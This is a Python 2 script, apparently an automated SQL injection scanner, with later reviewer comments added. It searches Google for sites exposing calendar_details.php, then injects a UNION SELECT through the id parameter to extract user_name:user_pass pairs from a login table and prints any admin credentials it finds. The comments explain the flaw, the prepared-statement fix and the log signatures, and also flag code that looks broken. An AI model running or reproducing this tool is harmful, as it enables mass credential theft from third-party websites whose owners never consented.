#coded by p1mps
import urllib2,httplib,sys,re
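def StripTags(text):
    """Return *text* with every ``<...>`` span removed.

    The leftmost ``<`` and the first ``>`` after it are cut out, repeatedly,
    until no ``<`` is left or the leftmost ``<`` has no closing ``>`` (that
    remainder is returned unchanged).

    This is a plain text-extraction helper, not an HTML sanitizer: it knows
    nothing about comments, entities, or ``>`` inside attribute values, so
    its output must not be treated as safe to render.
    """
    while True:
        start = text.find("<")
        if start < 0:
            break
        # Search from `start` instead of slicing first, so the tail of the
        # string is not copied on every pass.
        stop = text.find(">", start)
        if stop < 0:
            break
        text = text[:start] + text[stop + 1:]
    return text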
def tester(victim):
    """Request ``http://<victim>?id=<payload>`` once and search the reply for ``admin:<value>``.

    NOTE(review): the page lost this file's indentation; the nesting below is
    reconstructed from the statement order and should be confirmed against
    the original file.

    The payload is a fixed UNION SELECT against a table named ``login``.  A
    match indicates that the target builds its SQL from the ``id`` request
    parameter without binding it.  On the application side the fix is to pass
    ``id`` as a typed parameter of a prepared statement.  In web-server logs
    the request is recognisable by ``union+select`` and ``concat(`` in the
    query string together with the fixed User-Agent set below.

    Returns a list that holds the ``re.findall`` result (itself a list of
    strings) when something matched, otherwise an empty list.  Reads the
    module-level name ``proxy``.
    """
    usernames_passes = []
    print "testing " + victim
    # Ten-column UNION SELECT; the third column is user_name, ":" (0x3a) and
    # user_pass from table `login`, and "--" comments out the rest of the
    # original statement.
    sql = "-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--"
    try:
        print "[+] setting proxy"
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
        # NOTE(review): this opener is never installed or called in the
        # visible code; the request below is made with urllib2.urlopen(), so
        # it does not appear to go through the proxy given with -p. Confirm.
        opener = urllib2.build_opener(proxy_handler)
    except:
        # Bare except: any failure here (including an unset `proxy`) is only
        # reported, and the function carries on.
        print "Proxy:",proxy,"- Failed"
    try:
        req = urllib2.Request("http://"+victim+"?id="+sql)
        # Fixed User-Agent string sent with every test request.
        req.add_header('User-Agent', "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4")
        # Rebinds `opener` to a default opener; it is not used afterwards.
        opener = urllib2.build_opener()
        conn = urllib2.urlopen(req)
        st = conn.read()
        # Matches the literal "admin:" followed by letters, digits or "|"
        # (inside a character class the "|" is a literal), so only a row for
        # a user named "admin" is recognised.
        username_pass = re.findall("admin:[a-zA-Z|\d]+",st)
        if len(username_pass) > 0:
            usernames_passes.append(username_pass)
            # The printed URL uses "?=" where the request above used "?id=".
            print "found:" + "http://"+victim+"?="+sql
    except:
        # Bare except: network errors, HTTP errors and programming errors are
        # all collapsed into the same message.
        print "error"
    return usernames_passes
def geturls(query,num):
    """Collect host/path strings from Google result pages for *query*.

    NOTE(review): the page lost this file's indentation; the nesting below is
    reconstructed from the statement order and should be confirmed against
    the original file.

    Result pages are requested with ``start`` = 10, 20, ... while the offset
    is below ``int(num)``; the page at offset 0 is never requested.  Each page
    is printed in full, stripped of tags with ``StripTags`` and scanned with a
    loose "dotted name" regex.  Matches are de-duplicated, and any match
    containing "google" is dropped.

    Returns the list of collected strings (no URL scheme), after printing
    each one.
    """
    print "[+] getting urls"
    counter = 10
    urls = []
    while counter < int(num):
        # `query` is concatenated into the URL as-is, without URL-encoding.
        url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
        #url = "http://search.lycos.com/?query="+query+"&page="+repr(counter)
        # NOTE(review): build_opener() takes handler objects, not a URL
        # string; whether this call succeeds as written should be confirmed.
        opener = urllib2.build_opener(url)
        opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
        data = opener.open(url).read()
        # Dumps the raw response body to stdout.
        print data
        # Any "word.something.word" run in the tag-stripped text counts as a
        # candidate; the pattern also allows "-" and "/" in the middle part.
        hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
        #hosts = re.findall('<span class=\"?grnLnk small\"?>http:\/\/(.+?)\/',data)
        for x in hosts:
            # Drop whatever precedes the first "www" in the match.
            if x.find('www') != -1:
                x = x[x.find('www'):]
            # Keep first occurrences only and skip anything mentioning
            # "google".
            if x not in urls and re.search("google", x) == None:
                urls.append(x)
        counter += 10
    for url in urls:
        print url
    return urls
# Script entry: read -p/-n from the command line, collect candidate URLs for
# the search term below, then run tester() on each one.
# NOTE(review): the page lost this file's indentation; the nesting below is
# reconstructed from the statement order.
if len(sys.argv) <= 1:
    print "Usage: ./eventcalendar_scanner.py -p proxy -n num"
    sys.exit(1)
for arg in sys.argv:
    # The values are read from fixed positions (argv[2] and argv[4]) no matter
    # where the flag itself appears. If a flag is absent its name is never
    # bound, and the later use of `num` or `proxy` raises NameError.
    if arg == "-p":
        proxy = sys.argv[2]
    if arg == "-n":
        num = sys.argv[4]
# The search term selects indexed pages whose URL contains
# calendar_details.php, the script whose `id` parameter tester() probes.
urls = geturls("inurl:'calendar_details.php'",num)
#pass
for url in urls:
    # The return value is discarded; results are only visible in the printed
    # output.
    tester(url)